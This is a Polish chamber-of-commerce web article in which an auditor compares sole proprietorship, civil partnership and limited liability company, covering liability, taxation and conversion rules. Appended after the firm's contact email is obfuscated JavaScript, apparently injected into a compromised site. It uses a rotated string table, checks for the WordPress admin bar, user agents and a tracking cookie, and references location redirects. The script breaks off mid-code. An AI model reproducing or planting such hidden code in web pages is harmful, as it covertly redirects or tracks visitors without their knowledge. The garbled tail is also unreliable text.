DZIAŁALNOŚĆ INDYWIDUALNA CZY SPÓŁKA? | Północna Izba Gospodarcza w Koszalinie

Dr Aneta Szadkowska z DEBET Audyt Finanse Sp. z o.o.:

Praktyka pokazuje, że przedsiębiorcy najczęściej wybierają działalność na podstawie wpisu do CEIDG. Zarejestrowanych w ten sposób jest ponad 80% firm. Jednak prostota, niskie koszty, możliwość wyboru różnych form opodatkowania i łatwość rozpoczęcia i zamknięcia działalności są argumentem nie do przecenienia. Wygląda na to, że ograniczenie odpowiedzialności nie jest tu tak istotnym argumentem. Dopiero na drugim miejscu jest sp. z o.o.

W Polsce na tej podstawie zarejestrowanych jest 12% firm. Co innego, kiedy działalność nam się rozwija, rosną przychody i zyski a wraz z tym skala działalności i koszty. Rozwój wymusza zmiany w organizacji i rachunkowości firmy, a kiedy przekraczamy rocznie 2 mln EUR przychodów (w przeliczeniu na PLN) z mocy przepisów prawnych trzeba przejść na pełną rachunkowość. Koszty organizacji i prowadzenia firmy przestają więc mieć istotne znaczenie, bo i tak muszą być ponoszone albo w ramach wyspecjalizowanej komórki firmy, albo są zlecone profesjonalnej jednostce. Znaczenia nabiera natomiast wystawienie działalności na coraz większe ryzyko. Większa skala, to większe operacje, większe zobowiązania i więcej możliwości, że coś pójdzie nie tak. Nie jest trudno wyobrazić sobie sytuację, że kontrahent dostarczy nam wadliwy towar a mimo to zażąda zapłaty. Towaru nie sprzedamy, a zostaniemy długiem. Procesy sądowe toczą się latami, a wynik niepewny. Może się też zdarzyć na przykład sytuacja, że kooperant obciąży nas wysoką karą umowną. Nagle się okazuje, że nieprzewidziane zdarzenie powoduje utratę nie tylko firmy, ale całego życiowego dobytku. Prowadząc działalność indywidualną, warto więc w pewnym momencie zastanowić się czy nie zmienić formy działalności na spółkę kapitałową, czyli taką, gdzie odpowiedzialność za firmą ograniczona jest do wysokości kapitałów tej spółki. Kiedy to zrobić? Najwłaściwszy wydaje się ten moment, kiedy zmiana formy nie ma zbyt dużego wpływu na koszty organizacyjne (np. księgowość i tak jest prowadzona), natomiast nowa forma w znacznym stopniu wpływa na bezpieczeństwo właściciela firmy. Minusem prowadzenia działalności w formie spółki z o.o. jest fakt podwójnego opodatkowania. Zysk spółki opodatkowany jest podatkiem dochodowym 19%. Kiedy udziałowiec wypłaca zysk w formie dywidendy płaci i tak podatek od zysków kapitałowych. Prowadząc działalność jako przedsiębiorca indywidualny, lub wspólnik spółki osobowej płaci się tylko podatek dochodowy. Warto jednak rozważyć co jest w danym momencie istotniejsze. W sukcesywnie powiększającej się firmie od pewnego momentu gros zysków idzie na rozwój działalności, a przedsiębiorca wypłaca tylko część z nich. Podwójne opodatkowanie przestaje mieć więc tak istotne znaczenie. Natomiast ryzyko rośnie wraz z powiększaniem skali działalności.

Te wszystkie argumenty są istotne przy planowaniu dalszego rozwoju zarówno dla firmy jak i dla właściciela.

Spółka cywilna jest najprostszą formą prowadzenia biznesu. Jeśli masz wspólnika do którego masz 200% zaufania, nie planujesz współpracy z bardzo dużymi kontrahentami, a perspektywa bardzo szybkiego rozwoju Twojej firmy i zdominowania rynku na którym działasz,  jest  odległa to jest to bardzo przyjazna forma prowadzenia działalności gospodarczej.

Spółka z o.o. jest droższa w założeniu i jej prowadzeniu ale zapewnia większe bezpieczeństwo majątkowe jej udziałowcom. Wspólnicy spółki z o.o. nie są zobowiązani do płacenia składek ZUS. Ta forma działalności gospodarczej przeznaczona jest dla podmiotów działających wśród dużych graczy na mocno konkurencyjnym rynku.

Korzyści z przekształcenia spółki cywilnej w spółkę z o.o. są oczywiste biorąc pod uwagę odpowiedzialność wspólników .

Należy jednak mieć na względzie, że zasady odpowiedzialności ulegają co prawda zmianie z dniem przekształcenia, czyli z chwilą wpisu spółki przekształconej (spółki z o.o.) do rejestru przedsiębiorców, jednak wspólnicy spółki cywilnej odpowiadają na dotychczasowych zasadach (czyli całym swoim majątkiem) solidarnie ze spółką z ograniczoną odpowiedzialnością za zobowiązania spółki powstałe przed dniem przekształcenia przez okres trzech lat licząc od dnia przekształcenia (art. 574 kodeksu spółek handlowych).

Dlatego przekształcenie nie zawsze będzie skuteczną ucieczką od długów powstałych w ramach funkcjonowania spółki cywilnej.

Nowo powstała spółka z o.o. po przekształceniu ze spółki cywilnej przejmuje wszystkie prawa i obowiązki cywilnoprawne (przede wszystkim wynikające z różnych umów). Wyjątkiem może być sytuacja, w której w zawartych przez spółkę cywilną umowach znajdowały się klauzule rozwiązujące te umowy w przypadku przekształcenia spółki.

Przekształcenie spółki powoduje pełną kontynuację wszelkich stosunków prawnych z zakresu prawa pracy. Z dniem przekształcenia spółka z o.o. staje się pracodawcą w miejsce spółki cywilnej.

W sferze praw i obowiązków administracyjno-prawnych obowiązuje zasada tzw. warunkowej kontynuacji. Oznacza to, że uprawnienia wynikające z zezwoleń, koncesji lub ulg uzyskanych na podstawie decyzji administracyjnych przechodzą na spółkę przekształconą, chyba że w ustawie lub samej decyzji zastrzeżono inaczej.

W kolejnych artykułach Pani dr Aneta Szatkowska z Audyt Sp. z o.o. przedstawi różnice pomiędzy Spółką cywilną a spółka z o.o. Co jest korzystniejsze?
Zapraszamy do śledzenia naszych artykułów.

Dane do firmy zrzeszonej w Północnej Izbie Gospodarczej:

DEBET Audyt Finanse Spółka z ograniczoną odpowiedzialnością
Wpis na listę firm audytorskich pod numerem 4199

ul. H. Modrzejewskiej 71A
75-728 Koszalin
tel./fax 94 314 32 92
biuro@audytfinanse.com 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m